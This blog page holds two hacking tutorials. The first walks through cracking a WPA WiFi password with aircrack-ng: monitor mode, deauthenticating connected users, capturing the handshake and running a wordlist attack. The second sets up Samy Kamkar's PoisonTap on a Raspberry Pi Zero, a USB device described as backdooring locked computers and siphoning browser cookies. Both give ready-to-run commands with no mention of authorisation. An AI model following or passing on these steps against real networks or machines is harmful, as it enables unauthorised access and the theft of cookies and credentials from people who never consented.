Aaron Vigal’s Website

Programming, Security & Computer Science

Cracking WiFi Networks

Cracking WiFi Networks

Today we are going to look at gaining access into WiFi networks without the password. We’ll be using the tools on Kali Linux so if you don’t have that already, you can download it here. But if you don’t want to download a complete OS for this one purpose, the aircrack-ng suite is all that is required.

How it works

The idea behind this attack is to do a simple man in the middle. We will kick someone (or everyone) off the network, and as soon and they rejoin, we will capture the handshake between the router and the user and crack the hashed password. This may seem complicated, but sadly, it’s a lot easier than it sounds.

Let’s get started!

First off, we need to put our wireless adapter into monitor mode so we can retrieve packets. This is going to change the name of your network interface from wlan0 to wlan0mon.

airmon-ng start wlan0

Note: There may be some Interfering processes… You can kill these with kill <process #>
Next, we are going to get some information associated with the network. The two things we will need are the MAC address (BSSID) and the Channel number. Run this command and write down the information for your network.

airodump-ng wlan0mon

Now we will start capturing packets on the network, looking for a handshake. You are going to use the information you gathered earlier to fill in the placeholders in the command with the correct information.

airodump-ng -c <channel> -w <name> –bssid <bssid> wlan0mon

-c -> Channel number
-w -> Network name
–bssid -> MAC address

Since we are impatient and don’t want to have to wait for someone to join the network, we can speed up the process by kicking someone off. Open up a new terminal with the previous process still running, and type the following:

aireplay-ng -0 5 -a <bssid> wlan0mon

Make sure to fill the BSSID with one listen on the network in the other terminal window. You can close this terminal window when it has finished.

There should now be a WPA handshake shown in the top right. Press ctrl+c to stop the command. Now all we need to do is crack that handshake. We can do so by typing:

aircrack-ng -w /usr/share/wordlists/rockyou.txt <network name>-01.cap

This command might take a while. In the meantime, let’s talk about the potential of this. A hacker could easily create a script to automate this entire process. Combine that with a Raspberry Pi to create a mobile hacking machine. With a large enough wordlist, any network is vulnerable to this kind of attack. In fact, I’ve created a script to test this with. Yu can see it in action below or you can download it and try it yourself.

Poison Tap on Raspberry Pi Zero

PoisonTap on Raspberry Pi Zero

Today we are going to look at how to install Samy Kamkar’s PoisonTap on the Raspberry Pi Zero. This was an exploit designed to bypass locked and password protected computers over USB to install a persistent back-door and siphon cookies from your browser.

How it works:

When PoisonTap is plugged into a locked computer it emulates an Ethernet over USB device and gives the machine a crafted DHCP packet to trick your computer into believing that it should pass all of it’s network traffic through the PoisonTap.

Installing an OS on your Pi:

The first thing we are going to do is install an operating system on your Raspberry Pi Zero. I’ll be using Raspbian Jessie (recommended) all though lots of other systems work too.

Download Raspbian Jessie LITE from the Raspberry Pi Website and drag the .img file into a safe location. Now for burning the image onto your SD card. The process is the same across every operating systems, just with a different program. These are the programs I would recommend using:

MacOS: Apple Pi Baker

Windows: Win32 Disk Imager

Linux: Brasero (pre-installed)

Let that image burn onto the SD card and when it’s finished, move on to the next section to begin making the changes to boot partition.

Configuring the boot partition

By default, Raspbian disables some of the features that we want to take advantage of to allow us to get into the pi. First we are going to add the following line to the end of /boot/config.txt:

dtoverlay=dwc2

This is going to allow us to load modules onto the Raspberry PI itself. Now we need to actually load those modules. Add the following code segment after rootwait in /boot/cmdline.txt:

modules-load=dwc2,g_ether

Finally, as of late 2016, Raspbian has disabled SSH by default so we need to go re-enable it. To do this, we simple need to create a new file called ssh with no extensions in /boot/ssh. This file doesn’t need any contents, it simply has to exist.

SSH into the Raspberry Pi

Next we need to gain control over the pi via SSH. To do this, plug your Raspberry Pi into your computer over USB and make sure you are using USB input not PWR! This is essential since you cannot transmit any data over the power microUSB. Open up your terminal and type the following:

ssh pi@raspberrypi.local

When prompted for a password, type raspberry. These are the default credentials for the Raspberry Pi. You can go change these later by typing raspi-config.

Installing PoisonTap

If you are not using the Lite version of Raspbian for installing PoisonTap, you can this step. But the Lite version doesn’t ship with git installed, so we need to do that:

sudo apt-get install git

Next we need to clone Samy Kamkars repository onto the Pi. We can do this with the following command:

git clone https://github.com/samyk/poisontap.git

Now change directories into the new folder named poisontap:

cd poisontap

Now, we can run a simple setup script written to do all the dirty work for you to setup the files to run on boot, etc.

echo -e “\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0” >> /etc/network/interfaces
echo “dtoverlay=dwc2” >> /boot/config.txt
echo -e “dwc2\ng_ether” >> /etc/modules
echo “/bin/sh /home/pi/poisontap/pi_startup.sh” >> /etc/rc.local
mkdir /home/pi/poisontap
chown -R pi /home/pi/poisontap
apt-get update && apt-get upgrade
apt-get -y install isc-dhcp-server dsniff screen nodejs

The last thing we need to do in order to get PoisonTap up and running is to move the DHCP configuration file:

sudo mv dhcpd.conf /etc/dhcp/dhcpd.conf

You should now have an up and running PoisonTap device!
One note to take is that if your PoisonTap device is not acting as an Ethernet device as it should, you can change the VID and PID in pi_startup.sh to give it another shot!